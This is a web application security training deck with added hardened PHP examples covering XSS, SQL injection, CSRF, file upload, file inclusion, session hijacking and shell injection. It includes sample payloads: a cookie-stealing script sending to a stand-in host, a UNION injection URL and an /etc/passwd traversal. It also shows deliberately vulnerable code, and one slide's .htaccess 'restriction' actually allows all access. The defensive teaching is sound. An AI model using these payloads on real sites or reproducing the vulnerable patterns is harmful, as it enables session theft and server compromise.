Web Application Security - Folio3


Web Application Security: DOs and DON'Ts
M. Waseem & A. Mateen
23rd May 2013

@folio_3www.folio3.comCopyright 2015

Web Application Security
It's a vast topic.
If you do not know the attacks, how can you know about defense?
High-level and common vulnerabilities, and how to avoid them.

It is Important
75% of cyber attacks and internet security violations are generated through Internet applications.
Source: Gartner Group

Web applications are accessible and open to anyone. In many cases the source code is open source.

Vulnerabilities are common!
iViZ Security study (2012) shows:
- 99% of the apps tested had at least 1 vulnerability
- 82% of the web applications had at least 1 High/Critical vulnerability
- 90% of hacking incidents never become known to the public
- Average number of vulnerabilities per website: 35
- 30% of the hacked organizations knew the vulnerability (for which they got hacked) beforehand
- #1 vulnerability: Cross-site scripting (61%)

Research methodology: 300+ customers, 5,000+ application security tests; 25% of apps from Asia, 40% from the USA and 25% from Europe.

Top Vulnerabilities

High Level Vulnerabilities
- Cross-Site Scripting (XSS)
- Information leakage
- SQL Injection
- Cross-Site Request Forgery (CSRF)
- Unrestricted File Upload
- File Inclusion
- Phishing
- Session Hijacking
- Shell injection

Cross-Site Scripting (XSS)
An attacker can inject executable code (JS, HTML, etc.) into a webpage.
Example: http://site.com/search.php?q=alert(XSS)
Types:
- Non-Persistent
- Persistent

Cross-Site Scripting (XSS): Non-Persistent
The attacker is able to execute his own code in a webpage, but no persistent change is made to that website.
Example:
http://www.site.com/viewtopic.php?id=4">document.location="http://bad.com/logger.php?cookie="+document.cookie;
or
http://www.site.com/viewtopic.php?id=4>document.write();

Cross-Site Scripting (XSS): Persistent
The attacker stores executable code in the website database; it is executed every time the webpage shows that data.
Common targets:
- Comments
- User-submitted content
- Signup forms, etc.

Cross-Site Scripting (XSS): Example

Cross-Site Scripting (XSS)
Comment in raw format: "and I like the way this website developers work..hahaha :D :D"

Should have been printed like:

Cross-Site Scripting (XSS): Solutions
Input sanitization
- PHP functions strip_tags(), htmlentities(), htmlspecialchars()
- PHP filter_input()
- PHP libraries: HTML Safe, htmLawed, kses, Safe HTML Checker, etc.
Output sanitization
- PHP htmlentities(), htmlspecialchars()
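As an added example (not code from the Folio3 slides), the comment-rendering case from the previous slides, once with the user text interpolated as-is and once with htmlspecialchars() applied at the point of output. The comment data is constructed; the helper name e() is an assumption.

```php
<?php
// Added example, not from the original slides: output encoding for user-supplied
// text, the core fix for both non-persistent and persistent XSS.

// Constructed sample data: three stored comments, one carrying a script payload.
$comments = [
    ['author' => 'alice',   'body' => 'Nice site!'],
    ['author' => 'mallory', 'body' => '<script>document.location="http://bad.com/logger.php?cookie="+document.cookie</script>'],
    ['author' => 'bob',     'body' => 'I "love" the <b>layout</b> & the colours'],
];

// Encode for an HTML text node or a quoted attribute value.
// ENT_QUOTES covers both quote styles (attribute contexts); ENT_SUBSTITUTE keeps
// invalid UTF-8 from making htmlspecialchars() return an empty string and silently
// dropping the content.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable: the stored text becomes markup, so mallory's <script> runs for every viewer.
function renderCommentVulnerable(array $c): string
{
    return "<p><b>{$c['author']}</b>: {$c['body']}</p>";
}

// Hardened: every untrusted value is encoded where it is written into the page.
// The payload is displayed literally as text; bob's quotes, ampersand and <b> survive as characters.
function renderCommentSafe(array $c): string
{
    return '<p><b>' . e($c['author']) . '</b>: ' . e($c['body']) . '</p>';
}

header('Content-Type: text/html; charset=UTF-8');
foreach ($comments as $c) {
    echo renderCommentSafe($c), PHP_EOL;
}
```

Encoding at output is the control that works regardless of where the data came from; input filtering on top of it reduces what is stored but cannot be relied on alone, because the same value may later be written into a different context (attribute, JavaScript string, URL) that needs a different encoder. If formatted comments must be allowed, strip_tags() with an allow-list is not sufficient on its own, since it leaves event-handler attributes on the permitted tags; that is the case for the HTML sanitizer libraries the slide lists.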

Information Leakage
An application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.
Example:
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: YES) in /usr/www/kint/view.php on line 8
Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20

Example of information leakage:
https://www.google.com/search?q=%22admin+account+info%22+filetype%3Alog
http://code.jellycan.com/memcached/

Information Leakage
- Faulty directory listing configuration: all files in the directory are visible
- Improper error handling: error messages may contain paths, user and server info; in PHP specifically, the file path is revealed
- File type handling
- HTTP headers X-Powered-By, X-Generator etc.
- Sensitive HTML comments, etc.

Directory listing misconfiguration: leaving directory listing enabled allows the attacker to read the list of all files in a directory.

Information Leakage: Directory listing configuration
- Put a blank file named index.html in that directory.
- Disable indexing in .htaccess:
    Options -Indexes
  All sub-directories of that directory will also get their directory listings turned off.
Error handling
- Configure error messages using error_reporting, display_errors, log_errors and error_log in php.ini
- Configure error handling in .htaccess as well

Information Leakage: Remove headers which reveal information
- X-Powered-By, X-Generator etc.
- Use the header_remove() PHP function
Comments in source
- Never put much information in HTML or JS comments
- Comments should be in PHP so that they are not visible to visitors

Information Leakage: File types
Never keep downloadable files in a public directory unless they are meant to be public:
- Include files (.inc, .class, .db etc.)
- Compressed files (.zip, .rar, .tar.gz, etc.)
- Database files (.sql, .csv, .xml, .xls, etc.)
- Unknown files (.bak, .inc, .copy, .bkp, etc.)
Configure .htaccess:
    order allow,deny
    deny from all
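The error-handling and header advice from the last three slides, pulled together into one front-controller prologue. This is an added example, not code from the slides; the log path, the database credentials and the failing connection at the end are constructed to show the behaviour.

```php
<?php
// Added example, not from the original slides. Assumptions: PHP >= 7,
// /var/log/php/app.log writable by the web server user.

// 1. Report everything, display nothing, log everything (the php.ini settings
//    named on the slide, applied at runtime so the effect is visible in one file).
error_reporting(E_ALL);
ini_set('display_errors', '0');
ini_set('display_startup_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app.log');   // assumption: writable path

// 2. Promote warnings and notices to exceptions so a single handler sees every failure.
set_error_handler(function (int $severity, string $message, string $file, int $line): bool {
    if (!(error_reporting() & $severity)) {
        return false;   // honour @-suppression
    }
    throw new ErrorException($message, 0, $severity, $file, $line);
});

// 3. One exception handler: full detail (class, message, path, line) goes to the log,
//    the visitor gets a generic page and an opaque reference id for the support desk.
set_exception_handler(function (Throwable $e): void {
    $ref = bin2hex(random_bytes(6));
    error_log(sprintf('[%s] %s: %s in %s:%d', $ref, get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    if (!headers_sent()) {
        http_response_code(500);
        header('Content-Type: text/html; charset=UTF-8');
    }
    echo '<h1>Something went wrong</h1><p>Reference: '
        . htmlspecialchars($ref, ENT_QUOTES, 'UTF-8') . '</p>';
});

// 4. Remove fingerprinting headers before any output is sent.
header_remove('X-Powered-By');   // added by PHP when expose_php=On
header_remove('X-Generator');    // only present if the application or CMS set it

// Constructed failure: a connection with a wrong password. Without the handlers
// above this prints the kind of warning shown on the slide (user, host, script path
// and line); with them the visitor sees only the reference id.
$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', 'wrong-password');
```

The .htaccess snippets on the slide still belong in the deployment: display_errors=0 hides PHP's own messages, but directory listings and stray .sql or .bak files are served by the web server before PHP is ever involved.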

SQL Injection
The attacker is able to inject custom SQL into a query.
Example:
http://site.com/product.php?id=10+AND+1=2+union+select+1,2,database(),version(),user(),6+--

Select id, meta_title, name, details, category, metadescription WHERE id = 10 and deleted = 0

becomes

Select id, meta_title, name, details, category, metadescription WHERE id = 10 and 1=2 UNION select 1,2, database(), version(), user(), 6 -- and deleted = 0

SQL Injection: Solutions
- Escape the input: mysql_real_escape_string(), filter_var(), intval(), floatval()
- Filter input (use whitelists, not blacklists)
- Use prepared statements, parameterized queries, etc. Most frameworks/CMSs have them.
- Limit database permissions (start with the lowest permissions)
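The product lookup from the previous slides, written both ways, as an added example that is not the slides' code. The query columns follow the slide; the products table, the DSN and the read-only shop_ro account are assumptions.

```php
<?php
// Added example, not from the original slides. Assumes PDO with the MySQL driver.

// Least privilege: a read-only account for the catalogue pages, and no stacked queries.
function connect(): PDO
{
    return new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'shop_ro', 'secret', [
        PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES       => false,  // server-side parameters, not client-side quoting
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false,  // a product lookup never needs ';'-separated statements
    ]);
}

// Vulnerable: the query-string value becomes part of the SQL text, so
// ?id=10+AND+1=2+union+select+... rewrites the statement exactly as the slide shows.
function productVulnerable(PDO $pdo, string $id): ?array
{
    $sql = "SELECT id, meta_title, name, details, category, metadescription
            FROM products WHERE id = $id AND deleted = 0";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: whitelist the shape first (unsigned integer), then bind. A bound value
// can never change the statement's structure, so the UNION text is simply rejected
// as a non-numeric id before the database is even contacted.
function productSafe(PDO $pdo, string $id): ?array
{
    if ($id === '' || strlen($id) > 10 || !ctype_digit($id)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, meta_title, name, details, category, metadescription
                           FROM products WHERE id = :id AND deleted = 0');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$product = productSafe(connect(), (string) ($_GET['id'] ?? ''));
if ($product === null) {
    http_response_code(404);
    exit('Product not found');
}
```

Disabling emulated prepares matters: with emulation on, PDO quotes the values client-side, which is still safe for well-formed strings but depends on the connection charset being declared correctly (hence charset=utf8mb4 in the DSN).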

Cross-Site Request Forgery (CSRF)
Allows other websites to send unauthorized requests to a site, using the active session of its authorized users.
Example:
- The user visits a site where the attacker has already injected his code (hacked.com) in another tab/window
- A review is posted for bad.com

Cross-Site Request Forgery (CSRF)
document.Form.submit();

Consider a payment site.

Cross-Site Request Forgery (CSRF): Solution
- Use hash tokens in each generated form.
- Check the token when the form is submitted.
- Check the Referer header (partial protection).
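Both controls from this slide in one handler, as an added example that is not the slides' code: a per-session token written into every form and compared in constant time on submit, with an Origin/Referer check as the partial second layer. The site origin https://site.com and the review form are assumptions.

```php
<?php
// Added example, not from the original slides. Assumes PHP >= 7 and HTTPS.
session_start();

const APP_ORIGIN = 'https://site.com';   // assumption: the application's own origin

// One unguessable token per session, from the CSPRNG. hacked.com can make the
// victim's browser submit this form, but it cannot read the token to include it.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to emit into every state-changing form.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison; a missing, non-string or wrong token fails.
function csrfValid(array $post): bool
{
    $sent = $post['csrf_token'] ?? null;
    return is_string($sent) && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $sent);
}

// Partial protection: browsers set Origin (or Referer) on cross-site POSTs and
// page script cannot forge it. A missing header is treated as a failure here;
// some deployments must relax that because privacy tools strip Referer.
function sameOrigin(array $server): bool
{
    $src = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $p = parse_url($src);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return false;
    }
    $origin = $p['scheme'] . '://' . $p['host'] . (isset($p['port']) ? ':' . $p['port'] : '');
    return $origin === APP_ORIGIN;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrfValid($_POST) || !sameOrigin($_SERVER)) {
        http_response_code(403);
        exit('Request rejected');
    }
    // ... store the review / perform the payment for the logged-in user
}
?>
<form method="post" action="/review.php">
  <?= csrfField() ?>
  <textarea name="review"></textarea>
  <button>Post review</button>
</form>
```

The token check is the primary defence; the origin check only narrows the window for cases where a token leaks (for example through an XSS flaw on the same site, which the token cannot survive anyway).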

Unrestricted File Upload
Allows an attacker to upload malicious files to the server, most of the time scripts to take control of the server.
Example:
// No check on extension, content type or file name: whatever the client sends
// is written under uploads/ with the name the client chose.
$usrFile = $_FILES['userfile']['name'];
$uploadFolder = "uploads/";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadFolder . $usrFile)) {
    echo "File has been successfully uploaded.";
} else {
    echo "Error. Please try again!";
}

Unrestricted File Upload: Solution
- Whitelist the extensions which can be uploaded
- Check for double extensions
- Check the MIME type (partial solution)
- Rename the file before saving
- Restrict access to uploaded files (.htaccess):
    order deny,allow
    allow from all
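The upload handler from the previous slide rewritten with the controls listed here. This is an added example, not the slides' code; the storage directory /srv/app/uploads (outside the document root), the size limit and the extension table are assumptions.

```php
<?php
// Added example, not from the original slides. Assumes PHP >= 7 with the fileinfo
// extension, and that stored files are served back through a PHP script rather
// than directly by the web server.

const UPLOAD_DIR = '/srv/app/uploads';   // assumption: not under the document root
const MAX_BYTES  = 2 * 1024 * 1024;

// Whitelist: extension => MIME types acceptable for it, detected from the bytes,
// never taken from the client-supplied $_FILES[...]['type'].
const ALLOWED = [
    'png' => ['image/png'],
    'jpg' => ['image/jpeg'],
    'gif' => ['image/gif'],
    'pdf' => ['application/pdf'],
];

function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Extension whitelist on the LAST suffix only. A double extension such as
    // shell.php.png yields "png" here, and the stored name is rebuilt from scratch
    // below, so "php" never reaches the filesystem in any position.
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }

    // MIME check from content (partial: a polyglot file can satisfy both checks).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }

    // Rename: a random server-chosen name; client input is never a path component.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = UPLOAD_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // readable by the application, no execute bit
    return $stored;
}

if (isset($_FILES['userfile'])) {
    try {
        $id = storeUpload($_FILES['userfile']);
        echo 'File has been successfully uploaded as ', htmlspecialchars($id, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        error_log('upload rejected: ' . $e->getMessage());   // reason for operators only
        http_response_code(400);
        echo 'Error. Please try again!';
    }
}
```

Keeping the directory outside the document root is what makes the "restrict access" item robust: even if a script-like file were stored, the web server has no URL that maps to it, so the .htaccess rule becomes a second layer rather than the only one.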

File Inclusion
Allows an attacker to include a local or remote file into the vulnerable webpage code.
Example:
http://site.com/view.php?file=../../../../../etc/passwd
Files can be server configuration files such as system user information, filesystem structure, code, etc.

File Inclusion: Vulnerable PHP code
etc.

File Inclusion: Potential target functions
include()/include_once(), require()/require_once(), file_get_contents(), fopen(), file(), copy(), unlink(), upload_tmp_dir(), move_uploaded_file(), imagecreatefrom* functions, etc.

File Inclusion: Solutions
- Use the open_basedir setting in php.ini
- Filter input for the functions mentioned on the previous slide.
- Use whitelisted filenames or allow only valid file name characters (don't allow ../ etc.)
- Modify the php.ini configuration file:
    allow_url_fopen = Off
    allow_url_include = Off
    register_globals = Off (in older versions it's On by default)
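The view.php?file= case from the first File Inclusion slide with the whitelist and filename-character controls from this one. Added example, not the slides' code; the pages directory and the page names are assumptions.

```php
<?php
// Added example, not from the original slides. Assumes PHP >= 7 and a pages/
// directory beside this script holding home.php, about.php and contact.php.

const PAGES_DIR = __DIR__ . '/pages';
const PAGES     = ['home', 'about', 'contact'];   // the only includable names

// Vulnerable form from the slide, for contrast (never called here):
//   include 'pages/' . $_GET['file'];
// ?file=../../../../../etc/passwd walks out of pages/, and with allow_url_include=On
// a remote URL would be fetched and executed.

// Primary control: the request must name one of the known pages, nothing else.
// Defence in depth: even a whitelisted name must resolve inside PAGES_DIR, which
// guards against a later loosening of the list or a stray symlink.
function resolvePage(string $requested): ?string
{
    if (!in_array($requested, PAGES, true)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// When the set of pages is dynamic: a strict character class, no directory
// separators, no dots, and the server appends the extension itself.
function safeName(string $requested): ?string
{
    return preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested) === 1 ? $requested : null;
}

$page = resolvePage((string) ($_GET['file'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

open_basedir and allow_url_include=Off from the slide are the platform-level backstop for the same flaw; the code-level whitelist is what keeps the application correct when it is deployed on a host where those settings are not under your control.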

Phishing
Social engineering technique to steal confidential information through the use of a fake login page.
Example:
http://www.gooqle.com/accounts/ServiceLogin?service=mail

Phishing
An exact replica is served to the visitor; the entered data is sent to the hacker.

Phishing: Solutions
- Use HTTPS instead of HTTP, so that the user may see the details of the domain owner in the SSL certificate information.
- Use short URL addresses for login pages, so that users can easily recognize the login page address.
- Use a system like the Yahoo! Sign-in Seal: a unique identifier chosen by the user.

Session Hijacking
Allows unauthorized access as an authorized user by obtaining the active session identifier (SID).

Example:
http://wg180.site.com/dk;jsessionid=0754aff827cfe9f7db7f48e7018ed1e6.wg180?st.cmd=userMain&tkn=8809

Session Hijacking: Solutions
Store the SID in HTTP cookies
- Don't accept SIDs from GET and POST requests; use cookies:
    session.use_cookies = 1
    session.use_only_cookies = 1
  This will prevent session fixation by URL.
Regenerate the SID after login or on each request
- Put session_regenerate_id(true); after session_start()
Accept only SIDs generated by your own server
- Use $_SESSION['SERVER_GENERATED_SID'] to identify whether the SID has been created by your web server

Session Hijacking: Solutions (continued)
Destroy old SIDs
- Keep the session timeout small: ini_set("session.cookie_lifetime", "600");
- Completely destroy the session on user logout
Use SSL for user authentication and afterwards
- It will prevent network sniffing
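The settings from the two Session Hijacking slides assembled into one session bootstrap, as an added example that is not the slides' code. It assumes the site is served over HTTPS and PHP >= 7.3 (for the array form of session_set_cookie_params(); on older versions pass the parameters positionally and drop samesite); the 600-second timeout is the slide's value.

```php
<?php
// Added example, not from the original slides.

const SESSION_IDLE_SECONDS = 600;   // the slide's 600-second lifetime

function startHardenedSession(): void
{
    // Cookies only: a SID in the URL or POST body is ignored, so a link carrying
    // a chosen PHPSESSID cannot fix the victim's session (use_only_cookies), and
    // PHP never rewrites URLs to carry it (use_trans_sid).
    ini_set('session.use_cookies', '1');
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // Strict mode is PHP's built-in version of "accept only SIDs generated by own
    // server": an unknown id is discarded and a fresh one issued.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.cookie_lifetime', (string) SESSION_IDLE_SECONDS);
    ini_set('session.gc_maxlifetime', (string) SESSION_IDLE_SECONDS);

    session_set_cookie_params([
        'lifetime' => SESSION_IDLE_SECONDS,
        'path'     => '/',
        'secure'   => true,    // HTTPS only: the SID never crosses the network in clear
        'httponly' => true,    // not readable via document.cookie, so the XSS logger above gets nothing
        'samesite' => 'Lax',
    ]);
    session_start();

    // Server-side idle timeout: cookie_lifetime alone is enforced by the browser,
    // and garbage collection runs only probabilistically, so check the clock too.
    $now = time();
    if (isset($_SESSION['last_seen']) && $now - $_SESSION['last_seen'] > SESSION_IDLE_SECONDS) {
        destroySession();
        session_start();
    }
    $_SESSION['last_seen'] = $now;

    // Marker in the spirit of the slide's SERVER_GENERATED_SID: a session without it
    // did not go through this bootstrap, so it is re-keyed before being trusted.
    if (empty($_SESSION['SERVER_GENERATED_SID'])) {
        session_regenerate_id(true);
        $_SESSION['SERVER_GENERATED_SID'] = true;
    }
}

// Call right after a successful credential check: the pre-login id is discarded,
// so an id planted before authentication is worthless afterwards.
function onLogin(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
}

// Logout: wipe the data, expire the cookie, delete the server-side session.
function destroySession(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

startHardenedSession();
```

Regenerating the id on every request, which the slide offers as an alternative, is stricter but breaks concurrent requests from the same browser (the second request arrives with an id the first one just retired); regenerating at login and at privilege changes is the usual compromise.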

Multiple ways of setting the session timeout: cookie time, garbage collection time, manually.

Shell Injection
Allows an attacker to execute shell commands on the web server.
Example: http://site.com/delete.php?file=/

Shell Injection: Potential target functions
shell_exec(), exec(), system(), passthru(), eval()
Solution
- Disable shell functions using disable_functions in php.ini
- Allow only whitelisted commands to be used
- Use PHP built-in functions to escape the user input: escapeshellarg(), escapeshellcmd()
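The delete.php?file= handler from the previous slide, as an added example that is not the slides' code: the vulnerable pattern for contrast, a hardened version that avoids the shell altogether, and an escapeshellarg() example for the case where an external program is genuinely needed. The data directory and the ImageMagick identify invocation are assumptions.

```php
<?php
// Added example, not from the original slides. Assumes PHP >= 7 and a data
// directory /srv/app/data that is the only place files may be deleted from.

const DATA_DIR = '/srv/app/data';   // assumption

// Vulnerable (never called here): the query-string value is pasted into a command
// line, so /bin/sh interprets any shell metacharacters it contains.
function deleteVulnerable(string $file): void
{
    shell_exec('rm ' . DATA_DIR . '/' . $file);
}

// Hardened, preferred: no shell at all. Whitelist the characters, confine the
// resolved path to DATA_DIR, then use the PHP built-in.
function deleteSafe(string $file): bool
{
    if (preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $file) !== 1) {
        return false;    // rejects '/', spaces, ';', '|', '$', backticks, newlines...
    }
    $base = realpath(DATA_DIR);
    $path = realpath(DATA_DIR . '/' . $file);
    // dirname() === base also rejects "." and ".." which the character class allows
    if ($base === false || $path === false || dirname($path) !== $base || !is_file($path)) {
        return false;
    }
    return unlink($path);
}

// When an external tool is unavoidable: fixed program, fixed options, and every
// user-derived value wrapped by escapeshellarg() so it is exactly one argument
// and never command syntax. escapeshellcmd() is the weaker tool here: it escapes
// the whole command string and still lets the value introduce extra arguments.
function imageDimensions(string $path): ?string
{
    $cmd = 'identify -format ' . escapeshellarg('%wx%h') . ' ' . escapeshellarg($path) . ' 2>/dev/null';
    $out = shell_exec($cmd);
    return is_string($out) ? trim($out) : null;
}

$ok = deleteSafe((string) ($_GET['file'] ?? ''));
http_response_code($ok ? 200 : 400);
echo $ok ? 'Deleted' : 'Request rejected';
```

Listing shell_exec, exec, system, passthru and proc_open in disable_functions, as the slide suggests, turns a missed escape anywhere in the codebase into a fatal error rather than command execution; the code above then only needs the whitelist to keep working.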

In a Nutshell
- Never trust inputs: GET, POST, cookies, file uploads. Every input can be faked.
- Filter, sanitize, validate each input; use whitelists
- Don't allow HTML unless required
- Don't expose internal information of applications; handle exceptions
- Test and monitor the application for security
- Keep CMS, frameworks, plugins updated (at least security fixes)

Vulnerability Scanners
Acunetix WVS, Skipfish, AppScan, HP WebInspect, Nikto (Wikto), Netsparker, W3af, Grendel-Scan, Websecurify, Burp Suite, Uniscan, and more

Resources
- OWASP https://www.owasp.org/
- WASC http://projects.webappsec.org
- Vulnerapedia http://lab.gsi.dit.upm.es/semanticwiki/index.php/Main_Page
- CWE http://cwe.mitre.org/index.html
- Securiteam http://www.securiteam.com/
- Tracker of vulnerable sites http://www.vulntraq.com/